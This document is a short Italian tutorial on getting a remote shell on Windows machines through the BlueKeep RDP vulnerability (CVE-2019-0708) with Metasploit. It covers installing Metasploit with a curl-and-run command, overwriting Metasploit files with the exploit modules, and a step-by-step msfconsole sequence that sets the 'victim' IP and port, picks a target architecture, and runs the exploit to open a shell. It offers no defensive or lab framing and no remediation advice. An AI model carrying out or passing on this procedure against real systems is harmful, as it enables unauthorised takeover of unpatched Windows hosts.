
CVE-2019-0708 RCE esecuzione remota di codice getshell tutorial
Installazione e aggiornamento su Kali: curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \ chmod 755 msfinstall && \ ./msfinstall
Scarica il kit di attacco e posiziona i file nella cartella corrispondente di msf (se esistono già file con lo stesso nome, sovrascrivili direttamente).
rdp.rb -> /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/rdp.rb
rdp_scanner.rb -> /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
cve_2019_0708_bluekeep.rb -> /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
cve_2019_0708_bluekeep_rce.rb -> /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
Procedura di sfruttamento:
msfconsole
reload_all
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
Utilizza set RHOSTS [IP vittima] per impostare l'IP della vittima
Utilizza set RPORT [PORTA vittima] per impostare la porta RDP della vittima
Utilizza set target [numero ID (opzionale da 0 a 4)] per impostare l'architettura della macchina vittima
set target=3
exploit
shell
